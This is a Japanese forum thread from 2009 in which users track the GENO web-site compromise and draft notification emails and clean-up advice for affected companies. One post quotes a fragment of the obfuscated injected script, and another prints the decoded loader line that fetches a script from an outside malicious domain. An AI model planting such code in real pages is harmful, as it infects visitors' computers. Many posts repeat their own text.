82 :192.168.0.774:2009/05/17(日) 12:49:33 ID:T9pTie3x0
>>80
正攻法ならそれでいいんじゃない?
・ホームページを見た人が感染する
製作が別会社とか相手がアレだとGENO状態になるかもしれないけど
大手がやられて閉鎖してるってのは入れておいた方が良いとおもうw
so-net読んでもわからんかもね
正攻法ならそれでいいんじゃない?
・ホームページを見た人が感染する
製作が別会社とか相手がアレだとGENO状態になるかもしれないけど
大手がやられて閉鎖してるってのは入れておいた方が良いとおもうw
so-net読んでもわからんかもね
83 :192.168.0.774:2009/05/17(日) 12:54:36 ID:c9IgsGG/0
出版社のHPはいろんな大手書店が発注やら在庫確認なんかで使用するので
ものすごいことになると予想
普通に店頭のPCで開いて客に見せたりするからね
ものすごいことになると予想
普通に店頭のPCで開いて客に見せたりするからね
84 :192.168.0.774:2009/05/17(日) 12:55:41 ID:+3+vFr3c0
wiki重いぬ
85 :192.168.0.774:2009/05/17(日) 12:57:28 ID:ytTR6LEA0
烏骨鶏と出版社のWhoisを調べる。
86 :192.168.0.774:2009/05/17(日) 12:58:45 ID:Um/4qeYR0
成美堂出版が感染しました
87 :192.168.0.774:2009/05/17(日) 12:59:12 ID:6zykGUMd0
a. [ドメイン名] UKOKKEI.CO.JP
e. [そしきめい] かぶしきがいしゃ うこっけい
f. [組織名] 株式会社烏骨鶏
g. [Organization] ukokkei,co.,Ltd.
k. [組織種別] 株式会社
l. [Organization Type] Company
m. [登録担当者] MU2056JP
n. [技術連絡担当者] DT033JP
p. [ネームサーバ] ns1.webhosting-jp.com
p. [ネームサーバ] ns2.webhosting-jp.com
[状態] Connected (2009/11/30)
[登録年月日] 2004/11/16
[接続年月日] 2004/11/16
[最終更新] 2009/03/02 17:40:12 (JST)
e. [そしきめい] かぶしきがいしゃ うこっけい
f. [組織名] 株式会社烏骨鶏
g. [Organization] ukokkei,co.,Ltd.
k. [組織種別] 株式会社
l. [Organization Type] Company
m. [登録担当者] MU2056JP
n. [技術連絡担当者] DT033JP
p. [ネームサーバ] ns1.webhosting-jp.com
p. [ネームサーバ] ns2.webhosting-jp.com
[状態] Connected (2009/11/30)
[登録年月日] 2004/11/16
[接続年月日] 2004/11/16
[最終更新] 2009/03/02 17:40:12 (JST)
88 :192.168.0.774:2009/05/17(日) 12:59:17 ID:mJUiMCyk0
>>3の下の報告もここでいいのか?
邪魔になってない?
邪魔になってない?
89 :192.168.0.774:2009/05/17(日) 13:01:24 ID:ytTR6LEA0
90 :192.168.0.774:2009/05/17(日) 13:01:40 ID:Sggs+C2i0 BE:508227629-S★(634671)
91 :192.168.0.774:2009/05/17(日) 13:02:58 ID:6zykGUMd0
>>89
それが無いです
それが無いです
92 :192.168.0.774:2009/05/17(日) 13:05:32 ID:T9pTie3x0
93 :192.168.0.774:2009/05/17(日) 13:05:40 ID:ilxyL7Fy0
>>5
>Bavast!(無料のアンチウイルスソフト)で確認
これ違う。感染後の確認には使えない。
avastは、感染を撒き散らしているサイトのスクリプトの大半に反応するので、ブロックできる
可能性が高いというだけ。(感染しているのにすり抜けるページも幾つか確認しているので、
完全には信用できない)
すり抜けて本体が落とされてしまった場合、Avastで検索しても見つからない可能性が高い。
(ほぼ日替わりで本体が入れ代わっており、入れ代わった後のパターン対応はどこの
セキュリティソフトベンダーでも追い付いていない)
予防法としては、Avastで感染サイトを訪問すると反応する(いくらかのすり抜けは発生する)ので
チェック可能。但し、すり抜けた時はがっつり感染するので自己責任。
幾つかのベンダーが行なっている本体の置かれているサイトをFW機能でブロックするのが
一番確実な方法。FW機能のないセキュリティソフトの場合、PG2の併用によってブロックするのが有効。
但し、本体の置かれるアドレスが変更になった場合(先週の金曜日辺りに入れ代わったんだっけ?)
ブロック対象の指定を追加しなければいけない。
スクリプトを検知するAvastの方式も、IP範囲をブロックするカスペ等の方式も、両方完璧ではないが
予防法としては一定の効果が見込めるというだけ。
>Bavast!(無料のアンチウイルスソフト)で確認
これ違う。感染後の確認には使えない。
avastは、感染を撒き散らしているサイトのスクリプトの大半に反応するので、ブロックできる
可能性が高いというだけ。(感染しているのにすり抜けるページも幾つか確認しているので、
完全には信用できない)
すり抜けて本体が落とされてしまった場合、Avastで検索しても見つからない可能性が高い。
(ほぼ日替わりで本体が入れ代わっており、入れ代わった後のパターン対応はどこの
セキュリティソフトベンダーでも追い付いていない)
予防法としては、Avastで感染サイトを訪問すると反応する(いくらかのすり抜けは発生する)ので
チェック可能。但し、すり抜けた時はがっつり感染するので自己責任。
幾つかのベンダーが行なっている本体の置かれているサイトをFW機能でブロックするのが
一番確実な方法。FW機能のないセキュリティソフトの場合、PG2の併用によってブロックするのが有効。
但し、本体の置かれるアドレスが変更になった場合(先週の金曜日辺りに入れ代わったんだっけ?)
ブロック対象の指定を追加しなければいけない。
スクリプトを検知するAvastの方式も、IP範囲をブロックするカスペ等の方式も、両方完璧ではないが
予防法としては一定の効果が見込めるというだけ。
94 :192.168.0.774:2009/05/17(日) 13:06:06 ID:ytTR6LEA0
95 :192.168.0.774:2009/05/17(日) 13:06:43 ID:6zykGUMd0
>>92
あった?Whoisは公開されてるものだからいいでしょ
あった?Whoisは公開されてるものだからいいでしょ
96 :192.168.0.774:2009/05/17(日) 13:07:39 ID:ytTR6LEA0
97 :192.168.0.774:2009/05/17(日) 13:08:17 ID:IjPG7tgR0
>>80
素人向けには難しい言葉ばかりだな。
・GENOウィルスというコンピュータウィルスがある。
・pdfファイルを読むプログラムに問題があり感染する。
・現在御社のホームページは書き換えられ、GENOウィルスが仕込まれている。
・総務部門かホームページの担当者にこの情報を伝えて欲しい。
これぐらいでいいんじゃね?
素人向けには難しい言葉ばかりだな。
・GENOウィルスというコンピュータウィルスがある。
・pdfファイルを読むプログラムに問題があり感染する。
・現在御社のホームページは書き換えられ、GENOウィルスが仕込まれている。
・総務部門かホームページの担当者にこの情報を伝えて欲しい。
これぐらいでいいんじゃね?
98 :192.168.0.774:2009/05/17(日) 13:08:53 ID:6zykGUMd0
99 :192.168.0.774:2009/05/17(日) 13:08:58 ID:mJUiMCyk0
>>90
煽りや質問多いもんな
煽りや質問多いもんな
100 :192.168.0.774:2009/05/17(日) 13:09:52 ID:2KRNOGSH0
101 :192.168.0.774:2009/05/17(日) 13:10:13 ID:T9pTie3x0
102 :192.168.0.774:2009/05/17(日) 13:10:15 ID:um/XFnMU0
>>97
pdfなんて拡張子伝えられても訳ワカメだと思ったんでAdobe Readerって名前入れておいた。
それ以外に関してはそれでも良いかもだけど、その程度の情報だと今度は怪しい勧誘みたいにも聞える
pdfなんて拡張子伝えられても訳ワカメだと思ったんでAdobe Readerって名前入れておいた。
それ以外に関してはそれでも良いかもだけど、その程度の情報だと今度は怪しい勧誘みたいにも聞える
103 :192.168.0.774:2009/05/17(日) 13:10:30 ID:7TaPV4fL0
104 :192.168.0.774:2009/05/17(日) 13:11:54 ID:T9pTie3x0
105 :192.168.0.774:2009/05/17(日) 13:11:57 ID:ilxyL7Fy0
>>42
>・なんらかの方法によるサーバへの侵入
>FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。
・セキュ板のGENOスレの1か2辺りで、ローカルにしか繋いでいないサーバーのhtmlが書き換えられたという報告
(動作中のマルウェアが行なっているのか、外部からのバックドア経由の操作なのかは不明)
・ftpログを見たら、海外からのアクセスで改変が行われていたという報告(ftpパスは漏洩していると考えるべき)
・動作解説してるサイトの翻訳では、感染PCがゾンビ化するというものがあったので、BOTネットに組込まれている
可能性があり、そちらから操作される可能性がある
こんな感じかな。
>・なんらかの方法によるサーバへの侵入
>FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。
・セキュ板のGENOスレの1か2辺りで、ローカルにしか繋いでいないサーバーのhtmlが書き換えられたという報告
(動作中のマルウェアが行なっているのか、外部からのバックドア経由の操作なのかは不明)
・ftpログを見たら、海外からのアクセスで改変が行われていたという報告(ftpパスは漏洩していると考えるべき)
・動作解説してるサイトの翻訳では、感染PCがゾンビ化するというものがあったので、BOTネットに組込まれている
可能性があり、そちらから操作される可能性がある
こんな感じかな。
106 :192.168.0.774:2009/05/17(日) 13:12:03 ID:I5G8A/p20
107 :192.168.0.774:2009/05/17(日) 13:13:30 ID:ytTR6LEA0
108 :192.168.0.774:2009/05/17(日) 13:13:49 ID:6zykGUMd0
>>106
あり〜
あり〜
109 :192.168.0.774:2009/05/17(日) 13:16:03 ID:ilxyL7Fy0
○○○○ ご担当者さま
■ お願い
御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を
ダウンロードさせるスクリプトが挿入されております。
この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して
パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、
Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。
同様のスクリプトの仕込まれたHPを閲覧することで感染したPCを利用して、
HPの更新作業を行なったため、(該当PCで稼働中のマルウェアが行なったのか、
FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが)
現在の状況になっているものと思われます。
これは、先日、小林製薬のHPで発生したものと同じものと思われますので
状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知を
行なって頂けないでしょうか。
下記のXXXXXにて報告があり、当方でも確認したところ、確かに危険コードが
含まれておりました。HP閲覧者のPCにウイルスが勝手にダウンロードされて
しまうため、御社のHPが意図せぬ加害者となっております。
(感染報告のあったスレッド等のアドレス)
HP更新に使用したPCがマルウェア(通称zlkon・GENOウイルス)に感染していると思われます。
■ 確認した感染ページ
(わかる範囲で記載)
<多分、全てのページが感染中>
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。
●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
■ お願い
御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を
ダウンロードさせるスクリプトが挿入されております。
この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して
パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、
Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。
同様のスクリプトの仕込まれたHPを閲覧することで感染したPCを利用して、
HPの更新作業を行なったため、(該当PCで稼働中のマルウェアが行なったのか、
FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが)
現在の状況になっているものと思われます。
これは、先日、小林製薬のHPで発生したものと同じものと思われますので
状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知を
行なって頂けないでしょうか。
下記のXXXXXにて報告があり、当方でも確認したところ、確かに危険コードが
含まれておりました。HP閲覧者のPCにウイルスが勝手にダウンロードされて
しまうため、御社のHPが意図せぬ加害者となっております。
(感染報告のあったスレッド等のアドレス)
HP更新に使用したPCがマルウェア(通称zlkon・GENOウイルス)に感染していると思われます。
■ 確認した感染ページ
(わかる範囲で記載)
<多分、全てのページが感染中>
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。
●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
110 :192.168.0.774:2009/05/17(日) 13:17:21 ID:T9pTie3x0
111 :192.168.0.774:2009/05/17(日) 13:17:22 ID:ilxyL7Fy0
■感染していると思われるページの危険部分
(一応、ページによって内容異なるので、ソースチェッカーなり、
IE以外のブラウザでview-source:〜 で確認したものを貼り付ける)
|<script language=javascript><!--
|(function(){var UkRR='%';var WdBp=('v&61r&20a&3d&22S&63<以下省略>
| --></script>
■ 感染していると思われるウイルスの情報
下記のサイトの情報にあるマルウェアによるものと思われます。
これは、Web閲覧で知らぬうちに導入されてしまうものです。
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1864
http://www.kobayashi.co.jp/info/090512.html
http://www29.atwiki.jp/geno/
(↓はちょっと専門的な解説です)
http://ilion.blog.shinobi.jp/Entry/85/
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html
このマルウェアに感染したPCで、FTP接続しファイルを更新すると、動作中の
マルウェアが、感染サイトを呼び出すスクリプトを勝手に挿入してしまうため、
現在の状況になっているものと思われます。
PC内のアップロード前のファイルには、現在でも危険なコードは含まれて
いない筈ですので、PC復旧作業に入る前に、なんらかのメディアに
バックアップをとっておくと良いでしょう。
■ 解決方法について
駆除方法
http://www29.atwiki.jp/geno/pages/14.html
一度感染してしまうと、PC稼動状態で除去するのは困難ですので、必要なデータを
バックアップした後で、PCリカバリもしくはOS再インストールを行なって、
安全な環境にしてください。(IDとかパスワードのメモやブックマークも
忘れずにバックアップを)
OS再インストール(またはPCリカバリ)の後、WindowsUpdateを全て当てて、
セキュリティソフトを導入し、パターンを最新にした上で、各種アプリの
インストールや、バックアップしたデータの書き戻しを行なってください。
安全なPCから、不正なスクリプトを含まないhtmファイルをアップロードすることで
HPは正常な状態に戻ると思われます。
ftpパスワードやID、その他のSNSのパスワードなども、盗みだされている可能性が
ありますので、安全なPCから、自分の使用している(4月以降にログイン動作を
行なった可能性のある)パスワードを全て変更しておいたほうがいいかもしれません。
(一応、ページによって内容異なるので、ソースチェッカーなり、
IE以外のブラウザでview-source:〜 で確認したものを貼り付ける)
|<script language=javascript><!--
|(function(){var UkRR='%';var WdBp=('v&61r&20a&3d&22S&63<以下省略>
| --></script>
■ 感染していると思われるウイルスの情報
下記のサイトの情報にあるマルウェアによるものと思われます。
これは、Web閲覧で知らぬうちに導入されてしまうものです。
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1864
http://www.kobayashi.co.jp/info/090512.html
http://www29.atwiki.jp/geno/
(↓はちょっと専門的な解説です)
http://ilion.blog.shinobi.jp/Entry/85/
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html
このマルウェアに感染したPCで、FTP接続しファイルを更新すると、動作中の
マルウェアが、感染サイトを呼び出すスクリプトを勝手に挿入してしまうため、
現在の状況になっているものと思われます。
PC内のアップロード前のファイルには、現在でも危険なコードは含まれて
いない筈ですので、PC復旧作業に入る前に、なんらかのメディアに
バックアップをとっておくと良いでしょう。
■ 解決方法について
駆除方法
http://www29.atwiki.jp/geno/pages/14.html
一度感染してしまうと、PC稼動状態で除去するのは困難ですので、必要なデータを
バックアップした後で、PCリカバリもしくはOS再インストールを行なって、
安全な環境にしてください。(IDとかパスワードのメモやブックマークも
忘れずにバックアップを)
OS再インストール(またはPCリカバリ)の後、WindowsUpdateを全て当てて、
セキュリティソフトを導入し、パターンを最新にした上で、各種アプリの
インストールや、バックアップしたデータの書き戻しを行なってください。
安全なPCから、不正なスクリプトを含まないhtmファイルをアップロードすることで
HPは正常な状態に戻ると思われます。
ftpパスワードやID、その他のSNSのパスワードなども、盗みだされている可能性が
ありますので、安全なPCから、自分の使用している(4月以降にログイン動作を
行なった可能性のある)パスワードを全て変更しておいたほうがいいかもしれません。
112 :192.168.0.774:2009/05/17(日) 13:18:24 ID:ilxyL7Fy0
(以下を付けるかどうかはお好みで)
■再発防止策
WindowsUpdate、Adobe Acrobat Reader、Adobe Flash Playerの積極的なアップデートに
加えて、既知の危険サイト(今回の場合は、http://www29.atwiki.jp/geno/の焼却リスト参照)を
ブロックするよう、セキュリティソフトのFWを適切に設定したり、PG2といったソフトで
ブロックすることしかないと思います。
感染してしまったことは、新型の危険ファイル配布方法の為、仕方ない面もありますが、
再発防止と、閲覧者に対する告知によって、被害の拡大を食い止めて頂きたいと思います。
■私見による蛇足
小林製薬の告知ページ等では、幾つかのセキュリティソフトベンダーを紹介して
おりますが、実際に稼動する本体は、ほとんど日替わりのように入れ替えられて
いる為に、紹介されているセキュリティソフトにて「除去が行なえるとは言い
切れません」。
http://www.kobayashi.co.jp/info/090512.html
また、感染ファイルの除去を行なっても、Windowsの一部ファイルを変更して
しまっている為、原状復帰には至りませんので、閲覧者向けに告知される場合は、
セキュリティソフトベンダーのソフトでで駆除できる可能性もありますが
PCのリカバリを推奨するのが良いのではないかと思われます。
以上、要件のみにて失礼致します。
--
○○○○(自分の名前) <自分の連絡先メールアドレス>
■再発防止策
WindowsUpdate、Adobe Acrobat Reader、Adobe Flash Playerの積極的なアップデートに
加えて、既知の危険サイト(今回の場合は、http://www29.atwiki.jp/geno/の焼却リスト参照)を
ブロックするよう、セキュリティソフトのFWを適切に設定したり、PG2といったソフトで
ブロックすることしかないと思います。
感染してしまったことは、新型の危険ファイル配布方法の為、仕方ない面もありますが、
再発防止と、閲覧者に対する告知によって、被害の拡大を食い止めて頂きたいと思います。
■私見による蛇足
小林製薬の告知ページ等では、幾つかのセキュリティソフトベンダーを紹介して
おりますが、実際に稼動する本体は、ほとんど日替わりのように入れ替えられて
いる為に、紹介されているセキュリティソフトにて「除去が行なえるとは言い
切れません」。
http://www.kobayashi.co.jp/info/090512.html
また、感染ファイルの除去を行なっても、Windowsの一部ファイルを変更して
しまっている為、原状復帰には至りませんので、閲覧者向けに告知される場合は、
セキュリティソフトベンダーのソフトでで駆除できる可能性もありますが
PCのリカバリを推奨するのが良いのではないかと思われます。
以上、要件のみにて失礼致します。
--
○○○○(自分の名前) <自分の連絡先メールアドレス>
113 :192.168.0.774:2009/05/17(日) 13:19:27 ID:ilxyL7Fy0
114 :192.168.0.774:2009/05/17(日) 13:19:43 ID:mJUiMCyk0
115 :192.168.0.774:2009/05/17(日) 13:19:59 ID:AvccT1I50
ID:ilxyL7Fy0さん乙です
116 :192.168.0.774:2009/05/17(日) 13:20:16 ID:Sggs+C2i0
117 :192.168.0.774:2009/05/17(日) 13:21:09 ID:6zykGUMd0
>>109
文才ありますねー、それで送ってください
文才ありますねー、それで送ってください
118 :192.168.0.774:2009/05/17(日) 13:21:44 ID:GRfaSwDkP
>>116
製薬会社がウィルスに感染したとかとんでもないしな
製薬会社がウィルスに感染したとかとんでもないしな
119 :192.168.0.774:2009/05/17(日) 13:22:42 ID:T9pTie3x0
>>113
いやー管理者っつっても名前だけで外に製作任せてるかもしれんしな
まずは読ませる事を考えて、実例と顧客に被害が及ぶ事を説明して
信憑性あるサイトでも貼り付けて対応はよくわかる人に任せた方がいいんじゃない
何通もそんなの着ても速攻でゴミ箱いきな予感
いやー管理者っつっても名前だけで外に製作任せてるかもしれんしな
まずは読ませる事を考えて、実例と顧客に被害が及ぶ事を説明して
信憑性あるサイトでも貼り付けて対応はよくわかる人に任せた方がいいんじゃない
何通もそんなの着ても速攻でゴミ箱いきな予感
120 :192.168.0.774:2009/05/17(日) 13:24:51 ID:2KRNOGSH0
>>107
最近、いろいろな国内企業の公式サイトが 悪意の攻撃者に改竄されているのはご存知でしょうか?
先日も小林製薬のサイトも改竄されて、サイトを閲覧した一般のお客さんにウィルスが感染しました。
じつは・・・
みたいな切り出しでよいのでは?
対策法とかは、もしかしたら、その担当者がセキュリティーベンダーに相談するような方向の方が良いかもしれない。
尋ねられたら、知っている範囲で答えてあげればいいし。
それだと、イタズラに思われるかな?
最近、いろいろな国内企業の公式サイトが 悪意の攻撃者に改竄されているのはご存知でしょうか?
先日も小林製薬のサイトも改竄されて、サイトを閲覧した一般のお客さんにウィルスが感染しました。
じつは・・・
みたいな切り出しでよいのでは?
対策法とかは、もしかしたら、その担当者がセキュリティーベンダーに相談するような方向の方が良いかもしれない。
尋ねられたら、知っている範囲で答えてあげればいいし。
それだと、イタズラに思われるかな?
121 :192.168.0.774:2009/05/17(日) 13:25:33 ID:5zpzhS0v0
122 :192.168.0.774:2009/05/17(日) 13:26:25 ID:7TaPV4fL0
まさか、人に文を読ませるために考えることになるとは思わなかったなw
123 :192.168.0.774:2009/05/17(日) 13:27:17 ID:T9pTie3x0
アフェリみたいでうさんくさいwwwごめん(´・ω・`)
ちょっとスレから離れます。適当にがんがれw
俺は>>120路線でso-net張ってやって、
誰かに相談してねって方向が良いと思う
url貼っちゃうと感染してないPCで踏んじゃうかもね
ちょっとスレから離れます。適当にがんがれw
俺は>>120路線でso-net張ってやって、
誰かに相談してねって方向が良いと思う
url貼っちゃうと感染してないPCで踏んじゃうかもね
124 :192.168.0.774:2009/05/17(日) 13:27:52 ID:ytTR6LEA0
新たな「Webウイルス」が猛威、感染被害が急増:ITpro
http://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/
正規サイトに感染広がる:新手のWebベースマルウェアが急拡大 - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html
セキュリティ通信|セキュリティ関連ニュース バックナンバー
正規サイト改ざん(2) 薬事日報社が調査結果公表?改ざんの手口が明らかに
http://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=1868
セキュリティ通信|セキュリティ関連ニュース バックナンバー
正規サイト改ざん(3) ウイルスに感染しないための対策
http://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=1867
もし、メールを送るのなら、これもつけておくと吉かも。
http://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/
正規サイトに感染広がる:新手のWebベースマルウェアが急拡大 - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html
セキュリティ通信|セキュリティ関連ニュース バックナンバー
正規サイト改ざん(2) 薬事日報社が調査結果公表?改ざんの手口が明らかに
http://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=1868
セキュリティ通信|セキュリティ関連ニュース バックナンバー
正規サイト改ざん(3) ウイルスに感染しないための対策
http://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=1867
もし、メールを送るのなら、これもつけておくと吉かも。
125 :192.168.0.774:2009/05/17(日) 13:27:59 ID:rsI8zkAT0
126 :192.168.0.774:2009/05/17(日) 13:29:09 ID:77O8s7yk0
今までの流れをみてると、各自が自分でちゃんと対策するのに任せるしかないって気がするけどな。
127 :192.168.0.774:2009/05/17(日) 13:29:42 ID:0CtfCDPI0
>>111
unescape()して出てくるサイトの一覧ってどこにあるの?まとめサイト?
成美堂出版の改竄部分をunescape()したら martuz.cn が出たけど
<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
src=// なんて表記でちゃんとアクセスできるのかな? http: の部分を抜くのは何なんだ??
unescape()して出てくるサイトの一覧ってどこにあるの?まとめサイト?
成美堂出版の改竄部分をunescape()したら martuz.cn が出たけど
<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
src=// なんて表記でちゃんとアクセスできるのかな? http: の部分を抜くのは何なんだ??
128 :192.168.0.774:2009/05/17(日) 13:31:22 ID:fQ7GRX9bO
129 :192.168.0.774:2009/05/17(日) 13:32:13 ID:T9pTie3x0
御社のHPを拝見した所、ウイルスを検出しました。
HPが改変されています。
これは、現在流行っているウイルスの一種で、
HPを見るだけで感染してしまい、被害を拡大する恐れがあります。
こちらのso-netのリンクに詳細が書かれているので参考にしてください。
so−netのURL
ご対応の程、宜しくお願い申し上げます。
尚、ウイルスに関して現在判明している情報は以下の通りです。
まとめのURLか、セキュベンダーのURL
↑こんなんでどうでしょ
HPが改変されています。
これは、現在流行っているウイルスの一種で、
HPを見るだけで感染してしまい、被害を拡大する恐れがあります。
こちらのso-netのリンクに詳細が書かれているので参考にしてください。
so−netのURL
ご対応の程、宜しくお願い申し上げます。
尚、ウイルスに関して現在判明している情報は以下の通りです。
まとめのURLか、セキュベンダーのURL
↑こんなんでどうでしょ
130 :192.168.0.774:2009/05/17(日) 13:34:14 ID:Sggs+C2i0
正規のプロバイダメールで出せばどうなのかな?
ヘッダを見たらスパムメールじゃない事が分かるし
ヘッダを見たらスパムメールじゃない事が分かるし
131 :192.168.0.774:2009/05/17(日) 13:35:58 ID:77O8s7yk0
名前だしただけで信頼されるような大手が複数でこの問題を扱ってるのを示せるわけじゃないからなあ。
現状で個人ができることなんてたかが知れてるし、変なやる気出してマルチポストしまくるのはかえって問題だ。
ちゃんと説明できるやつが家族や友人の面倒みるくらいで十分じゃないか。
企業の面倒まで見切れない。
現状で個人ができることなんてたかが知れてるし、変なやる気出してマルチポストしまくるのはかえって問題だ。
ちゃんと説明できるやつが家族や友人の面倒みるくらいで十分じゃないか。
企業の面倒まで見切れない。
132 :192.168.0.774:2009/05/17(日) 13:36:03 ID:CRVJI+EQ0
一般人っぽく簡潔に書くのがいいんだろうな。やっぱり
133 :192.168.0.774:2009/05/17(日) 13:36:15 ID:T9pTie3x0
店舗のメアドに送るならヘッダすら見ないと思うし
製作した会社とか鯖缶宛てなら詳しい事書かないでも
まとめ見りゃわかるでしょ。一般的に見たら解らないものは拒否だから。
製作した会社とか鯖缶宛てなら詳しい事書かないでも
まとめ見りゃわかるでしょ。一般的に見たら解らないものは拒否だから。
134 :192.168.0.774:2009/05/17(日) 13:36:20 ID:ilxyL7Fy0
わたしの主人がオオアリクイに〜(以下略) みたいなタイトルで送るとか。(余計にスパムだなw)
ま、冗談はさておき
1.HP管理者は気付いてすらいないのが殆どなので、読んでもらう必要がある
2.放置すると、ウイルス感染の二次被害の加害者になる危険があることを説明
3.よくわからないコードであるところの危険部分がどこだか指摘
(どの箇所に挿入されるか書いておくだけでいいかも?)
4.対処方法の説明。
まずはPCリカバリかOS再インストール→ftpパスワードを変更する→Webサーバーの中身を空にする
→感染していないファイルを再UP の順番で行なうように説明
5.参考情報として、該当ウイルスの情報や対策についてのまとめリンクをつけておく
(これを前に持ってくるか後に持ってくるかはどっちがいいんだろう?)
6.おまけとして念のために予防策の説明(は、押し付けがましいのでなくてもいいかも)
ま、冗談はさておき
1.HP管理者は気付いてすらいないのが殆どなので、読んでもらう必要がある
2.放置すると、ウイルス感染の二次被害の加害者になる危険があることを説明
3.よくわからないコードであるところの危険部分がどこだか指摘
(どの箇所に挿入されるか書いておくだけでいいかも?)
4.対処方法の説明。
まずはPCリカバリかOS再インストール→ftpパスワードを変更する→Webサーバーの中身を空にする
→感染していないファイルを再UP の順番で行なうように説明
5.参考情報として、該当ウイルスの情報や対策についてのまとめリンクをつけておく
(これを前に持ってくるか後に持ってくるかはどっちがいいんだろう?)
6.おまけとして念のために予防策の説明(は、押し付けがましいのでなくてもいいかも)
135 :192.168.0.774:2009/05/17(日) 13:36:50 ID:uL9xj+2n0
>>129
非常勤の親父「また迷惑メールか削除削除・・・」
非常勤の親父「また迷惑メールか削除削除・・・」
136 :192.168.0.774:2009/05/17(日) 13:36:57 ID:K2sBx0VP0
上で誰かが書いてたか、お客さんを装った平易な文章のほうがいい気がする
「お宅のホームページ見てたらアンチウイルスソフトが警告を出したので、調べてみたら
ウイルスコードがしかけられているようでした。
(so-netURL)と同じものと思われます。
ホームページを見るだけで、お客のパソコンが感染する危険なウイルスです。
どうか今すぐ対策をとってください
(対策サイトURL)」
とかなんとか
「お宅のホームページ見てたらアンチウイルスソフトが警告を出したので、調べてみたら
ウイルスコードがしかけられているようでした。
(so-netURL)と同じものと思われます。
ホームページを見るだけで、お客のパソコンが感染する危険なウイルスです。
どうか今すぐ対策をとってください
(対策サイトURL)」
とかなんとか
137 :192.168.0.774:2009/05/17(日) 13:37:27 ID:Um/4qeYR0
【速報】虹裏感染の疑い
138 :192.168.0.774:2009/05/17(日) 13:37:57 ID:T9pTie3x0
139 :192.168.0.774:2009/05/17(日) 13:38:09 ID:mJUiMCyk0
複数名から違う文章で送れば 対応してくれんかなあ
140 :192.168.0.774:2009/05/17(日) 13:39:11 ID:ilxyL7Fy0
7.閲覧者への事後報告と、感染の可能性の疑われる場合は、使用中のセキュリティソフトベンダーに
相談するように告知して欲しい、隠蔽されてしまうと、被害が拡大し、最終的にはその企業の信用が
落ちてしまう。…ということも伝えたいがどうしたもんか。
相談するように告知して欲しい、隠蔽されてしまうと、被害が拡大し、最終的にはその企業の信用が
落ちてしまう。…ということも伝えたいがどうしたもんか。
141 :192.168.0.774:2009/05/17(日) 13:39:34 ID:77O8s7yk0
メールちゃんと読んでくれるような管理者ならすでに問題を知っていて対策してるだろ。
2chのまとめだってどこまで信頼してもらえるか微妙だし、こちらの所属を明らかにして送るんでもなければスパム扱いで終わりだ。
2chのまとめだってどこまで信頼してもらえるか微妙だし、こちらの所属を明らかにして送るんでもなければスパム扱いで終わりだ。
142 :192.168.0.774:2009/05/17(日) 13:39:58 ID:T9pTie3x0
143 :192.168.0.774:2009/05/17(日) 13:41:26 ID:ilxyL7Fy0
HP管理者ではなく、そのIPを管理している業者(whoisで調べる)のabuse窓口に送って、
ISPもしくは、レンタルサーバー管理会社を経由して警告して貰うという手法もあるね。
ISPもしくは、レンタルサーバー管理会社を経由して警告して貰うという手法もあるね。
144 :192.168.0.774:2009/05/17(日) 13:43:33 ID:um/XFnMU0
もうこれぐらい挑発的なので良いんじゃないか?
これ送って反応無ければ、たまたま見つけた人っぽく上のメール送ってやる感じで
貴社のホームページがGENOウィルスに感染し、現在加害者になっています。
数日中に貴社ホームページよりウィルスコードの除去がなされていない場合、
京都府警察ハイテク犯罪対策室へ連絡させていただきます。
p.s. 対策に関してはググレ
管理できないホームページなら閉鎖しろ糞管理人
これ送って反応無ければ、たまたま見つけた人っぽく上のメール送ってやる感じで
貴社のホームページがGENOウィルスに感染し、現在加害者になっています。
数日中に貴社ホームページよりウィルスコードの除去がなされていない場合、
京都府警察ハイテク犯罪対策室へ連絡させていただきます。
p.s. 対策に関してはググレ
管理できないホームページなら閉鎖しろ糞管理人
145 :192.168.0.774:2009/05/17(日) 13:44:37 ID:T9pTie3x0
てめーこのやろー
ページ開いたらパソコンばっ壊れたじゃねーか
さっさとHP直しやがれ誠意ってなんですかねぃおおぅ?!
ページ開いたらパソコンばっ壊れたじゃねーか
